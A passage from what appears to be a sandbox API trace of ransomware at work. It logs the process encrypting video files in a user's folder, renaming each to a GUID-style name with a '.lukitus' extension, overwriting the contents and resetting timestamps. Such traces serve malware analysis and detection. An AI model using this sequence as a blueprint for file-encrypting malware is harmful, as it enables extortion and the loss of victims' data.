pbBuffer=0x281f6dc) returned 1 [0109.376] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.381] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x10be2, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x10be2, lpOverlapped=0x0) returned 1 [0109.382] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.382] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x10be2, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x10be2, lpOverlapped=0x0) returned 1 [0109.382] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.382] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x65377970, dwHighDateTime=0x1d31760)) [0109.382] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.382] FlushFileBuffers (hFile=0x328) returned 1 [0109.386] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\ROpsn4ybvdCclm8gHa1.avi" (normalized: "c:\\users\\aetadzjz\\videos\\h1uvhzax1oe 6hqdg\\ropsn4ybvdcclm8gha1.avi"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ce6b420, ftCreationTime.dwHighDateTime=0x1d2f9a8, ftLastAccessTime.dwLowDateTime=0x9ccb370, ftLastAccessTime.dwHighDateTime=0x1d2f681, ftLastWriteTime.dwLowDateTime=0x9ccb370, ftLastWriteTime.dwHighDateTime=0x1d2f681, nFileSizeHigh=0x0, nFileSizeLow=0x17122)) returned 1 [0109.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.386] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.386] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\ROpsn4ybvdCclm8gHa1.avi" (normalized: "c:\\users\\aetadzjz\\videos\\h1uvhzax1oe 6hqdg\\ropsn4ybvdcclm8gha1.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.386] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\ROpsn4ybvdCclm8gHa1.avi" (normalized: "c:\\users\\aetadzjz\\videos\\h1uvhzax1oe 6hqdg\\ropsn4ybvdcclm8gha1.avi"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\F56924BE-9663-41BB-03B5ADAF-240C69733345.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\h1uvhzax1oe 6hqdg\\f56924be-9663-41bb-03b5adaf-240c69733345.lukitus"), dwFlags=0x9) returned 1 [0109.388] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.388] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.393] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x17122, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x17122, lpOverlapped=0x0) returned 1 [0109.394] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.394] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x17122, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x17122, lpOverlapped=0x0) returned 1 [0109.394] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.395] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6539dad0, dwHighDateTime=0x1d31760)) [0109.395] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.395] FlushFileBuffers (hFile=0x328) returned 1 [0109.398] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\Z VwmDF.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\h1uvhzax1oe 6hqdg\\z vwmdf.mp4"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23435460, ftCreationTime.dwHighDateTime=0x1d2fb56, ftLastAccessTime.dwLowDateTime=0xd054e1e0, ftLastAccessTime.dwHighDateTime=0x1d2f76f, ftLastWriteTime.dwLowDateTime=0xd054e1e0, ftLastWriteTime.dwHighDateTime=0x1d2f76f, nFileSizeHigh=0x0, nFileSizeLow=0xd940)) returned 1 [0109.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.398] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.398] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\Z VwmDF.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\h1uvhzax1oe 6hqdg\\z vwmdf.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.398] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\Z VwmDF.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\h1uvhzax1oe 6hqdg\\z vwmdf.mp4"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\H1UVhZaX1OE 6HQDG\\F56924BE-9663-41BB-4A8325C8-D3DD48FE9B0E.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\h1uvhzax1oe 6hqdg\\f56924be-9663-41bb-4a8325c8-d3dd48fe9b0e.lukitus"), dwFlags=0x9) returned 1 [0109.400] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.400] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.405] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xd940, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xd940, lpOverlapped=0x0) returned 1 [0109.406] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.406] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xd940, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xd940, lpOverlapped=0x0) returned 1 [0109.406] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.406] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x653c3c30, dwHighDateTime=0x1d31760)) [0109.406] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.407] FlushFileBuffers (hFile=0x328) returned 1 [0109.410] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\HktBrKL.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\hktbrkl.mp4"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd020de90, ftCreationTime.dwHighDateTime=0x1d2fc1a, ftLastAccessTime.dwLowDateTime=0x18c31570, ftLastAccessTime.dwHighDateTime=0x1d2ffd9, ftLastWriteTime.dwLowDateTime=0x18c31570, ftLastWriteTime.dwHighDateTime=0x1d2ffd9, nFileSizeHigh=0x0, nFileSizeLow=0xad08)) returned 1 [0109.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.410] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.410] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\HktBrKL.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\hktbrkl.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.411] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\HktBrKL.mp4" (normalized: "c:\\users\\aetadzjz\\videos\\hktbrkl.mp4"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\F56924BE-9663-41BB-8A8002EE-8EAA9E43EA07.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\f56924be-9663-41bb-8a8002ee-8eaa9e43ea07.lukitus"), dwFlags=0x9) returned 1 [0109.412] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.412] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.417] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xad08, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xad08, lpOverlapped=0x0) returned 1 [0109.417] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.417] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xad08, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xad08, lpOverlapped=0x0) returned 1 [0109.418] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.418] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x653e9d90, dwHighDateTime=0x1d31760)) [0109.418] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.418] FlushFileBuffers (hFile=0x328) returned 1 [0109.421] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\rnbs_ lcM4.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\rnbs_ lcm4.mkv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cd79730, ftCreationTime.dwHighDateTime=0x1d30617, ftLastAccessTime.dwLowDateTime=0x4c815480, ftLastAccessTime.dwHighDateTime=0x1d305b5, ftLastWriteTime.dwLowDateTime=0x4c815480, ftLastWriteTime.dwHighDateTime=0x1d305b5, nFileSizeHigh=0x0, nFileSizeLow=0xf155)) returned 1 [0109.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.421] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0109.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0109.421] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0109.421] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Videos\\rnbs_ lcM4.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\rnbs_ lcm4.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0109.422] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Videos\\rnbs_ lcM4.mkv" (normalized: "c:\\users\\aetadzjz\\videos\\rnbs_ lcm4.mkv"), lpNewFileName="c:\\Users\\aETAdzjz\\Videos\\F56924BE-9663-41BB-6DBB5E47-DBEBE7A5FEA3.lukitus" (normalized: "c:\\users\\aetadzjz\\videos\\f56924be-9663-41bb-6dbb5e47-dbebe7a5fea3.lukitus"), dwFlags=0x9) returned 1 [0109.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0109.423] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0109.428] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xf155, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xf155, lpOverlapped=0x0) returned 1 [0109.428] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0109.428] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xf155, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xf155, lpOverlapped=0x0) returned 1 [0109.429] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0109.429] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x653e9d90, dwHighDateTime=0x1d31760)) [0109.429] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0109.429] FlushFileBuffers (hFile=0x328) returned 1 [0109.433] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Videos\\YDhL-_Oa9J5GrHs.swf" (normalized: "c:\\users\\aetadzjz\\videos\\ydhl-_oa9j5grhs.swf"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b131940, ftCreationTime.dwHighDateTime=0x1d3021e, ftLastAccessTime.dwLowDateTime=0xe4334260, ftLastAccessTime.dwHighDateTime=0x1d301fb, 